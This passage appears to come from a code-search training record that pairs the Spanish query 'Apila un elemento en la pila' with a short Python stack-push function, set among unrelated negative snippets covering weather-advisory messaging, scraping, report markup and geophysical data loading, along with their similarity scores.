(DISCUSSION|INTERMEDIATE ADVISORY|FORECAST/ADVISORY|ADVISORY|MEMEME) NUMBER\\s+([0-9]+)\", raw.replace(\"PUBLIC ADVISORY\", \"ZZZ MEMEME\") )\n if (len(tokens) > 0):\n tt = tokens[0][0]\n what = tokens[0][1]\n tnum = tokens[0][2]\n if (tokens[0][1] == \"MEMEME\"):\n tokens2 = re.findall(\"(PUBLIC ADVISORY) NUMBER\\s+([0-9]+) FOR (.*)\", raw)\n what = tokens2[0][0]\n tt = tokens2[0][2]\n mess = \"%s: %s issues %s #%s for %s %s\" % (wfo2, centertext.get(wfo, wfo), what, tnum, tt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s #%s</a> for %s\" % ( centertext.get(wfo, wfo), myurl, what, tnum, tt)\n #print htmlmess, mess\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n twt = \"%s issues %s %s for %s\" % (centertext.get(wfo, wfo), what, tnum, tt)\n common.tweet(channels, twt, myurl)\n\n\n for seg in prod.segments:\n # The segment needs to have ugc codes\n if (len(seg.ugcs) == 0):\n continue\n # If the product has VTEC, it is handled by the vtec ingestor\n if (len(seg.vtec) > 0 and ['MWS','HLS'].__contains__(pil)):\n log.msg(\"VTEC FOUND!, skipping\")\n continue\n\n # If the product has HVTEC, it is handled by other ingestor too\n if (len(seg.hvtec) > 0 and ['FLW','FFA','FLS'].__contains__(pil)):\n log.msg(\"HVTEC FOUND!, skipping\")\n continue\n\n counties = countyText(seg.ugcs)\n if (counties.strip() == \"\"):\n counties = \"entire area\"\n expire = \"\"\n if seg.ugcexpire is not None:\n if prod.z:\n expire = \"till \"+ (seg.ugcexpire - datetime.timedelta(hours= reference.offsets[prod.z] )).strftime(\"%-I:%M %p \")+ prod.z\n\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n mess = \"%s: %s issues %s for %s %s %s\" % \\\n (wfo, wfo, prodtxt, counties, expire, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> for %s %s\" % (wfo, myurl, prodtxt, counties, expire)\n jabber.sendMessage(mess, htmlmess, xtra)\n twt = \"%s for %s %s\" % (prodtxt, counties, expire)\n common.tweet([wfo,], twt, myurl)\n\n# PUBLIC ADVISORY NUMBER 10 FOR REMNANTS OF BARRY\n# TROPICAL DEPRESSION BARRY ADVISORY NUMBER 5\n# TROPICAL STORM BARRY INTERMEDIATE ADVISORY NUMBER 2A\n\n if (pil == \"TCM\" or pil == \"TCP\" or pil == \"TCD\"):\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, pil, myurl)\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (wfo, myurl, prodtxt)\n jabber.sendMessage(mess, htmlmess, xtra)\n common.tweet([wfo,], prodtxt, myurl)\n\n\n\n for key in routes.keys():\n if (re.match(key, prod.afos)):\n channels = []\n for wfo2 in routes[key]:\n mess = \"%s: %s %s\" % \\\n (wfo2, prod.afos, myurl)\n htmlmess = \"<a href=\\\"%s\\\">%s</a>\" % (myurl, prodtxt)\n tokens = re.findall(\"(.*) (DISCUSSION|INTERMEDIATE ADVISORY|FORECAST/ADVISORY|ADVISORY|MEMEME) NUMBER\\s+([0-9]+)\", raw.replace(\"PUBLIC ADVISORY\", \"ZZZ MEMEME\") )\n if (len(tokens) > 0):\n tt = tokens[0][0]\n what = tokens[0][1]\n tnum = tokens[0][2]\n if (tokens[0][1] == \"MEMEME\"):\n tokens2 = re.findall(\"(PUBLIC ADVISORY) NUMBER\\s+([0-9]+) FOR (.*)\", raw)\n what = tokens2[0][0]\n tt = tokens2[0][2]\n mess = \"%s: %s issues %s #%s for %s %s\" % (wfo2, centertext.get(wfo, wfo), what, tnum, tt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s #%s</a> for %s\" % ( centertext.get(wfo, wfo), myurl, what, tnum, tt)\n #print htmlmess, mess\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n twt = \"%s issues %s %s for %s\" % (centertext.get(wfo, wfo), what, tnum, tt)\n common.tweet(channels, twt, myurl)", "def get_and_prepare_data_string():\n\n request = requests.get(\"https://pastebin.com/raw/a83ELw6K\")\n request.encoding = 'ISO-8859-1'\n\n return request.text", "def cmd_stru(args):", "def _get_name_save(self, id: int):\n # print(\"id\", id)\n name_protein = self.files_refined[id]\n array_feat_names = [name_protein, \"feature\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n array_mask_names = [name_protein, \"mask\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n array_geo_names = [name_protein, \"geo\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n name_feature = \"_\".join(array_feat_names) + \".pt\"\n name_mask = \"_\".join(array_mask_names) + \".pt\"\n name_geo = \"_\".join(array_geo_names) + \".pt\"\n path_feat = os.path.join(self.init_refined, name_protein, name_feature)\n path_mask = os.path.join(self.init_refined, name_protein, name_mask)\n path_geo = os.path.join(self.init_refined, name_protein, name_geo)\n return path_feat, path_mask, path_geo", "def seqOfAsciiCode(prova):\n\n # lista in char\n #[ ord (c) for c in prova]\n # la codifica della stringa in hex\n #\"stringa\".decode('hex')\n value = \"\"\n for i in range(len(prova)):\n if (i != len(prova) - 1):\n value = value + str(ord(prova[i])) + \",\"\n else:\n value = value + str(ord(prova[i]))\n return value", "def get_translation(self, lang):\n if lang==\"it\":\n url=self.backstring+\"en/\"+self.name\n image=self.backstring+\"img/uk.png\"\n alttext='English version'\n elif lang==\"en\":\n url=self.backstring+\"it/\"+self.name\n image=self.backstring+\"img/it.png\"\n alttext='Italian version'\n img='<img src=\"%s\" height=\"15\" alt=\"%s\"><br>%s' % (image, alttext,alttext, )\n a=A(img, url, \"translation\")\n return str(a)", "def main():\n roman = \"la-jangada.txt\"\n #roman = \"texte-de-test.txt\"\n liste_caracteres = extraction_caracteres(roman)\n print(len(liste_caracteres))\n # liste_caracteres = suppression_ponctuation(liste_caracteres)\n # liste_caracteres = suppression_blancs(liste_caracteres)\n # liste_caracteres = suppression_chiffres(liste_caracteres)\n # liste_caracteres = transformation_accents(liste_caracteres)\n liste_caracteres = nettoyage(liste_caracteres)\n \n liste_caracteres = transformation_minuscules(liste_caracteres)\n # print(liste_caracteres)\n dict_car = creation_dict_car(liste_caracteres)\n # print(dict_car)\n dict_car = analyse_dict_car(dict_car)\n #print(dict_car)\n affichage_dict(dict_car)", "def carregar():\n global estado\n fp = open(\"partida_mm.json\", \"r\")\n estado = json.load(fp)\n fp.close()", "def __init__(self):\n\n self._nb_vie = donnees.nb_essai\n\n self._mot_a_trouver = str()\n\n self._mot_en_cours = list() # Sera initilaiser par un nb de 0 = len(mot_a_trouver) sera modifier a chaque proposition juste\n # Il permettra de tester la victoire\n\n self._nom_joueur = str()", "def _loadUIString(strId):\n pass", "def pauta(lst_splen, lst_pauta):\n\n tmp=''\n\n #inicio do bloco \n tmp+='\\t<story>\\n'\n\n for dicsp in lst_splen:\n\n #sessao plenaria\n if dicsp['sessao']!=None:\n tmp+='\\t\\t<para style=\"P0\">' + dicsp['sessao'].replace('&','&amp;') +', EM ' + dicsp['datasessao'].replace('&','&amp;')+ '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dicsp['ind_audiencia'] == 1:\n tmp+='\\t\\t<para style=\"P1\"></para>\\n'\n else:\n tmp+='\\t\\t<para style=\"P1\">(Pauta da Ordem do Dia)</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"12\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n\n #inicio do bloco que contem os flowables\n \n for dic in lst_pauta:\n #espaco inicial\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"10\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n #condicao para a quebra de pagina\n tmp+='\\t\\t<condPageBreak height=\"5mm\"/>\\n'\n\n #pauta\n if dic['num_ordem']!=None:\n tmp+='\\t\\t<para style=\"P4\"><font color=\"#222\"><b>Item nº ' + str(dic['num_ordem']) + '</b></font></para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dic['id_materia']!=None:\n if dic['cod_materia']!='':\n tmp+='\\t\\t<para style=\"P4\"><b><font color=\"#126e90\"><u>' + dic['link_materia']+'</u></font> - '+ dic['nom_autor'] + '</b></para>\\n'\n if dic['cod_parecer']!='': \n tmp+='\\t\\t<para style=\"P4\"><b><font color=\"#126e90\"><u>' + dic['link_materia']+'</u></font> - '+ dic['nom_autor'] + ', que '+ dic['txt_materia'] + '</b></para>\\n'\n tmp+='\\t\\t<para style=\"P3\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dic['txt_ementa']!=None:\n tmp+='\\t\\t<para style=\"P3\">' + dic['txt_ementa'].replace('&','&amp;') + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['des_turno']!='':\n tmp+='\\t\\t<para style=\"P3\"><b>Turno</b>: '+ dic['des_turno'] +' | <b>Quorum</b>: '+ dic['des_quorum']+' | <b>Tipo de Votação</b>: '+ dic['tip_votacao'] + '' + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"8\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['parecer']!= 0 and dic['parecer']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>PARECERES:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n for item in dic['pareceres']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + item[\"link_materia\"] + '</font> - ' + item[\"conclusao\"] + '</b> ' + item[\"relatoria\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['substitutivo']!= 0 and dic['substitutivo']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>SUBSTITUTIVOS:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n' \n for substitutivo in dic['substitutivos']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + substitutivo[\"id_substitutivo\"] + '</font> - ' + substitutivo[\"autoria\"] + '</b> - ' + substitutivo[\"txt_ementa\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n\n if dic['emenda']!= 0 and dic['emenda']!= '':\n tmp+='\\t\\t<para style=\"P3\"><b><u>EMENDAS:</u></b></para>\\n\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n' \n for emenda in dic['emendas']:\n tmp+='\\t\\t<para style=\"P3\"><b><font color=\"#126e90\">' + emenda[\"id_emenda\"] + '</font> - ' + emenda[\"autoria\"] + '</b> - ' + emenda[\"txt_ementa\"] + '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n return tmp", "def carga_datos_slab2( directorio, latini, latfin, cambiarnan = True ):\n\n # se chequea si el input directorio es o no string\n if not isinstance( directorio, basestring ) :\n directorio = str(directorio)\n else:\n directorio = directorio\n\n # se chequea el formateo del string (se desea que no termine con /)\n if not directorio.endswith(\"/\"):\n directorio = directorio + \"/\"\n\n\n # archivo de profundidad\n proffile = directorio + \"sam_slab2_dep_02.23.18.xyz\" # nombre del archivo de prof\n slabprof = np.genfromtxt(proffile, delimiter = \",\") # se lee el archivo a un array\n # archivo de dip\n dipfile = directorio + \"sam_slab2_dip_02.23.18.xyz\" # nombre del archivo de dip\n slabdip = np.genfromtxt(dipfile, delimiter = \",\") # se lee el archivo a un array\n # archivo de strike\n strfile = directorio + \"sam_slab2_str_02.23.18.xyz\"\n slabstrike = np.genfromtxt(strfile, delimiter = \",\") # se lee el archivo a un array\n\n # las longitudes estan en formato 0 - 360, se cambian a -180 - 180\n slabprof[:,0] = slabprof[:,0] - 360\n slabdip[:,0] = slabdip[:,0] - 360\n slabstrike[:,0] = slabstrike[:,0] - 360\n\n # se cambia dimensiones de los array para graficar\n repslat = col.Counter( slabprof[:,1] ).values( )[0] # (n cols) formato xyz repite valores de latitud para cada longitud, se obtiene cuantas veces se repite este valor para reshape\n repslon = len( slabprof )/repslat # (n filas)\n\n lon = np.reshape( slabprof[:,0], ( repslon, repslat ) )\n lat = np.reshape( slabprof[:,1], ( repslon, repslat ) )\n prof = np.reshape( slabprof[:,2], ( repslon, repslat ) ) * -1\n dip = np.reshape( slabdip[:,2], ( repslon, repslat ) )\n strike = np.reshape( slabstrike[:,2], ( repslon, repslat ) )\n\n idx = ( lat <= latini ) & ( lat >= latfin ) # indices de las latitudes dentro del area de interes\n # numero de columnas se mantiene (repslat), disminuye solo numero de filas (repslon)\n lon_adi = lon[idx] # adi: area de interes\n lat_adi = lat[idx]\n prof_adi = prof[idx]\n dip_adi = dip[idx]\n strike_adi = strike[idx]\n\n #idx_lonini = np.where(lon[0,] == lonini)[0][0]\n #idx_lonfin = np.where(lon[0,] == lonfin)[0][0]\n\n # redimensionar arrays\n filas = len(lat_adi)/repslat # cantidad de filas en array cortado nuevo\n lon = np.reshape( lon_adi, ( filas, repslat ) )\n lat = np.reshape( lat_adi, ( filas, repslat ) )\n prof = np.reshape( prof_adi, ( filas, repslat ) ) * 1000\n dip = np.reshape( dip_adi, ( filas, repslat ) )\n strike = np.reshape( strike_adi, ( filas, repslat ) )\n\n # si se desea se puede cambiar los valores nan por 0\n if cambiarnan:\n prof[ np.isnan( prof ) ] = 0\n dip[ np.isnan( dip ) ] = 0\n strike[ np.isnan( strike ) ] = 0\n\n # se debe revisar que la profundidad este en metros\n if prof.max( ) < 1000 :\n prof *= 1000\n\n return lon, lat, prof, dip, strike, repslat, repslon" ]
[ "0.58442247", "0.5648824", "0.56434804", "0.56288433", "0.5588605", "0.5584497", "0.5554773", "0.5449711", "0.54150164", "0.53789884", "0.5370985", "0.532739", "0.53188556", "0.5307319", "0.52647316", "0.51832354", "0.51682794", "0.51462793", "0.51443756", "0.51443756", "0.51443756", "0.51443756", "0.51443756", "0.5140873", "0.51317626", "0.51271486", "0.5119429", "0.5099722", "0.5092418", "0.5089064", "0.5079697", "0.5070909", "0.5063762", "0.5053209", "0.5047713", "0.50371736", "0.5035778", "0.5032324", "0.5014526", "0.5014362", "0.5008312", "0.49985367", "0.4990685", "0.49764657", "0.49665862", "0.4954783", "0.4951041", "0.49411684", "0.4937337", "0.4935545", "0.4915884", "0.49001852", "0.48991656", "0.48986292", "0.4896145", "0.48890153", "0.48855966", "0.48823303", "0.48796538", "0.48618495", "0.48390275", "0.48347732", "0.48347732", "0.48305646", "0.4827028", "0.48217514", "0.48101684", "0.480071", "0.4798712", "0.4798712", "0.47983843", "0.47959468", "0.47943637", "0.47861585", "0.47832736", "0.4781864", "0.4778959", "0.477604", "0.47721413", "0.47657523", "0.47636703", "0.47569275", "0.47549555", "0.4754031", "0.47538745", "0.47536027", "0.47486937", "0.47470778", "0.47463667", "0.47419208", "0.4730562", "0.47287452", "0.47273082", "0.47249076", "0.47219202", "0.47216737", "0.47203082", "0.47195938", "0.47156942", "0.4712588" ]
0.59360135
0
Apila un elemento en la pila
def apilar(pila, dato): pila.tope += 1 pila.datos[pila.tope] = dato
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_podataka_sa_REST(self):\n urlUredjaj = self.cfg.get_konfig_element('REST', 'uredjaj')\n listaUredjaja = helper_funkcije.get_uredjaje_sa_REST(urlUredjaj)\n #inicijalizacija svih dostupnih uredjaja\n if listaUredjaja:\n for uredjaj in listaUredjaja:\n UNIT = Uredjaj(serial=uredjaj)\n tekst = helper_funkcije.get_podatke_za_uredjaj_sa_REST(urlUredjaj, uredjaj)\n #ako postoje podaci za uredjaj\n if tekst:\n try:\n root = ET.fromstring(tekst)\n #OSNOVNI PODACI UREDJAJA\n try:\n lokacija = helper_funkcije.get_lokaciju_uredjaja(urlUredjaj, uredjaj)\n UNIT.set_lokacija(lokacija)\n self.add_postaju(lokacija)\n except Exception:\n pass\n try:\n proizvodjac = root.find('modelUredjajaId/proizvodjacId/naziv').text\n UNIT.set_proizvodjac(proizvodjac)\n except Exception:\n pass\n try:\n oznakaModela = root.find('modelUredjajaId/oznakaModela').text\n UNIT.set_oznakaModela(oznakaModela)\n except Exception:\n pass\n #ANALITICKA METODA\n METODA = AnalitickaMetoda()\n try:\n ID = root.find('./modelUredjajaId/analitickeMetodeId/id').text\n METODA.set_ID(ID)\n except Exception:\n pass\n try:\n norma = root.find('./modelUredjajaId/analitickeMetodeId/norma').text\n METODA.set_norma(norma)\n except Exception:\n pass\n try:\n naziv = root.find('./modelUredjajaId/analitickeMetodeId/naziv').text\n METODA.set_naziv(naziv)\n except Exception:\n pass\n #elementi za racunanje...(Srz, Srs, rz, rmax...)\n try:\n metode = root.find('./modelUredjajaId/analitickeMetodeId')\n for granica in metode.findall('dozvoljeneGraniceCollection'):\n try:\n oznaka = granica.find('./ispitneVelicine/oznaka').text\n value = granica.find('max').text\n if oznaka == 'o':\n METODA.set_o(value)\n #pokusaj dolaska do mjerne jedinice\n jedinica = granica.find('./mjerneJediniceId/oznaka').text\n jedinica = helper_funkcije.adapt_mjernu_jedinicu(jedinica)\n METODA.set_jedinica(jedinica)\n elif oznaka == 'Ec':\n #za efikasnost konvertera treba i min granica\n METODA.set_Ec_max(value)\n minvalue = granica.find('min').text\n METODA.set_Ec_min(minvalue)\n else:\n METODA.set_member[oznaka](value)\n except Exception:\n pass\n except Exception:\n pass\n #ako metoda ne postoji na popisu... dodaj ju\n self.set_novu_analiticku_metodu(ID, METODA)\n #postavi analiticku metodu u uredjaj\n UNIT.set_analitickaMetoda(METODA)\n #KOMPONENTE UREDJAJA\n try:\n komponente = root.find('modelUredjajaId')\n for komponenta in komponente.findall('komponentaCollection'):\n KOMPONENTA = Komponenta()\n try:\n formula = komponenta.find('formula').text\n KOMPONENTA.set_formula(formula)\n naziv = komponenta.find('naziv').text\n KOMPONENTA.set_naziv(naziv)\n mjernaJedinica = komponenta.find('./mjerneJediniceId/oznaka').text\n mjernaJedinica = helper_funkcije.adapt_mjernu_jedinicu(mjernaJedinica)\n KOMPONENTA.set_jedinica(mjernaJedinica)\n kv = komponenta.find('konvVUM').text\n KOMPONENTA.set_kv(kv)\n #dodaj komponentu u mapu\n self.set_novu_komponentu(formula, KOMPONENTA)\n #dodaj komponentu u uredjaj\n UNIT.dodaj_komponentu(KOMPONENTA)\n except Exception:\n pass\n except Exception:\n pass\n #postavi uredjaj u mapu sa serijskim uredjajima\n self.dodaj_uredjaj(uredjaj, UNIT)\n except Exception as err:\n logging.warning(str(err))\n self.create_local_cache()\n else:\n self.load_local_cache()", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def get(self, obj):", "def getById(self, id):\r\n try:\r\n c = self.conn.cursor()\r\n c.execute(\"SELECT * FROM Ksiazka WHERE id=?\", (id,))\r\n wpis_row = c.fetchone()\r\n ksiazka = Ksiazka(id=id)\r\n if wpis_row == None:\r\n ksiazka=None\r\n else:\r\n ksiazka.date = wpis_row[1]\r\n c.execute(\"SELECT * FROM Wpisy WHERE ksiazka_id=? order by name\", (id,))\r\n wpis_items_rows = c.fetchall()\r\n items_list = []\r\n for item_row in wpis_items_rows:\r\n item = WpisItem(name=item_row[0], nazwisko=item_row[1], numer=item_row[2], ulica=item_row[3], nrdomu=item_row[4], nrmieszkania=item_row[5], miasto=item_row[6])\r\n items_list.append(item)\r\n ksiazka.wpisy=items_list\r\n except Exception as e:\r\n #print \"ksiazka getById error:\", e\r\n raise RepositoryException('error getting by id ksiazka_id: %s' % str(id))\r\n return ksiazka", "def get_obj():\n idPadre = request.args.get('id')\n nombrePadre = nombreObjeto(idPadre)\n global variablesActualizables\n variablesActualizables = -1\n print(\"consulta objetos id: {}, padre: {}\".format(idPadre,nombrePadre))\n\n try:\n objetos = g.db.query(Objetos).filter_by(NombreObjetoPadreObjeto=nombrePadre).filter_by(Activo=True).all()\n except NoResultFound:\n print \"NO resultados para el padre {}\".format(nombrePadre)\n objetos = []\n\n try:\n funciones = g.db.query(Funciones).filter_by(NombreObjetoPadreFuncion=idPadre).all()\n except NoResultFound:\n print \"NO funciones para el padre {}\".format(nombrePadre)\n funciones = []\n\n try:\n variables = g.db.query(Variables).filter_by(NombreObjetoPadreVariable=idPadre).all()\n except NoResultFound:\n print \"NO variables para el padre {}\".format(nombrePadre)\n variables = []\n if nombrePadre != None:\n Padre=\"Elementos de {}\".format(nombrePadre)\n else:\n Padre=\"Objetos Activos\"\n return render_template('show_objects.html',padre=Padre, objetos=objetos, funciones=funciones, variables=variables)", "def getVotacion(self, url):", "def updatePeliculas():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_peliculas = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s&byciudad=1\" #id_ciudad\n \n\tciudades = parse_ciudades( urlopen(url_movil) ) \n\t\n\t\n\tbase_url_pelicula = \"http://www.cinemex.com/cartelera/pelicula.php?vcode=%s\" #mex_vc\n\tpeliculas = {}\n \n\tpelis_obj = [] #Contiene toda la info de las peliculas, titulo, sinopsis, etc\n \n\t#Crea un diccionario con el vc y el objeto de la pelicula\n\t#De esta forma no hay peliculas repetidas\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_peliculas % ciudad_id\n\t\ttry:\n\t\t\txml = urlopen(xml_url)\n\t\texcept:\n\t\t\tlogger.debug( 'error cargando pagina %s' % xml_url)\n\t\t\tcontinue\n\t\tpelis_actual = parse_peliculas(xml)\n\t\t#Agregar las peliculas q no estan todavia\n\t\tfor peli in pelis_actual:\n\t\t\tkey = peli.get('mex_vc', '')\n\t\t\tif key not in peliculas: peliculas[key] = peli\n \n\tfor k, v in peliculas.items():\n\t\turl = base_url_pelicula % k\n\t\thtml = urlopen(url)\n\t\tpelis_obj.append(scrape_pelicula(html, v))\n \n\tfor peli in pelis_obj:\n\t\tcreatePelicula(peli)", "def Item(self) -> object:", "def Item(self) -> object:", "def get_data(self):", "def agregar_bolsa(self, letra, cantidad):", "def scraper_voto(self):\n\n #per trovare il link a fantacalcio.it devo prima trovare il link della squadra e trovare il suo nome\n soup_rosa = BeautifulSoup(\n requests.get(f\"{self.LINK_FANTACALCIO_IT}/{self.team}#rosa\").text,\n \"html.parser\",\n )\n print(self.name)\n\n displayed_name = self.name\n if displayed_name == \"Coulibaly\": # caso estremo, il sito si confonde\n displayed_name = \"Coulibaly M.\"\n\n # trovo il link personale del giocatore e glielo assegno\n link = soup_rosa.find(\"a\", text=displayed_name.upper())[\"href\"]\n self.scheda_giocatore = link\n\n # leggo voto e media voto\n soup = BeautifulSoup(requests.get(link).text, \"html.parser\")\n\n self.media_voto = float(soup.find_all(class_=\"nbig2\")[0].text.replace(\",\", \".\"))\n self.media_fantavoto = float(\n soup.find_all(class_=\"nbig2\")[1].text.replace(\",\", \".\")\n )\n\n # leggo anche il ruolodalla schedina delle info\n infos = soup.find_all(class_=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\")[-2]\n self.ruolo = str(infos.find(\"span\").text)\n\n # compilo i dati: partite, gol e assist\n dati_partite = soup.find_all(class_=\"nbig\")\n\n partite = \"🥅 \" + dati_partite[0].text\n # i portieri hanno statistiche diverse!\n if self.ruolo == \"P\":\n goal = \"❌ \" + dati_partite[1].text\n self.dati = \"<br>\".join([partite, goal])\n else:\n goal = \"⚽ \" + dati_partite[1].text\n assist = \"👟 \" + dati_partite[2].text\n self.dati = \"<br>\".join([partite, goal, assist])\n\n # aggiungo stellina al nome se hanno una bella media voto\n if self.media_fantavoto > 7:\n self.name += \" ⭐\"", "def mezclar_bolsa(self):", "def get(self, _id):", "def __str__(self):\n return self.idBaixasPagar", "def get(self, request, **kwargs):\n elementos_list = Elementos.objects.all()\n return render(request, 'alchemy/mezclar.html', {'elementos_list' : elementos_list})", "def ListaDeCarrerasAPI(request):\n if request.method == 'GET':\n carreras = Carrera.objects.all()\n serializer = CarreraSerializer(carreras, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = CarreraSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def get_by_id(id, lista):\n for inventar in lista:\n if get_id(inventar) == id:\n return inventar\n return None", "def data(self):", "def elems(self):", "def fetch_data(self):", "def items(self):", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def VIEJOupdateComplejos():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_complejos = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s\"\n\t\n\t\n\tciudades = parse_ciudadesxml( urlopen(xml_ciudades) )#Diccionario de ciudades de Mexico\n\t\n\t#xml = urlopen(xml_complejos)\n\t#ids = parse_complejosxml(xml)\n\t\n\tbase_url = \"http://www.cinemex.com/cinemex/complejos.php?cvecine=%s\"\n\t\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_complejos % ciudad_id\n\t\tcomplejos_xml = urlopen(xml_url)\n\t\tcomplejos = parse_complejosxml(complejos_xml)\n\t\tfor comp in complejos:\n\t\t\turl = base_url % comp['id_org']\n\t\t\tcomp_html = urlopen(url)\n\t\t\tcomplejo, platino = scrape_compInfo(comp_html,comp)\n\t\t\t#logger.debug( complejo['id_org'])\n\t\t\tcomplejo['id_ciudad']= ciudad_id\n\t\t\t#createComplejo(complejo)\n\t\t\tlogger.debug( complejo)\n\t\t\tlogger.debug( platino)\n\t\t\t#if platino: createComplejoPlatino(complejo)", "def getFieldValue(self, field, no_html=False, external_id=True, depth=1, optimize=False):\n if field[\"type\"] == \"category\":\n if field[\"config\"][\"settings\"][\"multiple\"]:\n values = []\n for category in field[\"values\"]:\n values.append(category[\"value\"][\"text\"])\n return values\n else:\n return field[\"values\"][0][\"value\"][\"text\"]\n elif field[\"type\"] == \"image\":\n values = []\n for image in field['values']:\n values.append([image[\"value\"][\"mimetype\"], image[\"value\"][\"file_id\"]])\n return values\n elif field[\"type\"] == \"date\":\n return field[\"values\"][0]\n elif field[\"type\"] == \"app\":\n itemID = field[\"values\"][0][\"value\"][\"item_id\"]\n appID = field[\"values\"][0][\"value\"][\"app\"][\"app_id\"]\n if depth<=0:\n return itemID\n else:\n if optimize:#Si es necesario optimizar la carga del item\n try: #Intenta buscar la lista de items como un atributo en self\n items = getattr(self, str(appID))\n except AttributeError:\n #Como no los encontró, crea una nueva PodioAPI con la appID de destino y le pide los items\n if self.client:\n nested_api = self\n else:\n try:\n nested_api = self.__class__(appID)\n except: #TODO: Especificar la excepcion que es de tipo \"DoesNotExist\"\n raise Exception(\"Hubo un error creando el nuevo objeto 'PodioApi' para el item relacionado con app_id %s. Por favor agregar el app_id y el app_token de esa aplicacion a la base de datos\" % appID)\n items = nested_api.get_filtered_items(None, depth=depth-1)\n #Luego crea el atributo para que esta llamada no se repita\n setattr(self, str(appID), items)\n #Ya teniendo a todos los items, busca entre la lista aquel cuya ID es igual al item ID de la referencia, y lo pone como valor del campo.\n item = None\n for i in items:\n if i[\"item\"] == int(itemID):\n item = i\n\n else:\n data = self._client.Item.find(int(itemID))\n if not external_id:\n item = self.make_dict(data, external_id=external_id, depth=depth-1)\n else:\n item = self.makeDict(data, nested=True)\n return item\n elif field[\"type\"] == \"text\":\n text = field[\"values\"][0][\"value\"]\n if no_html and 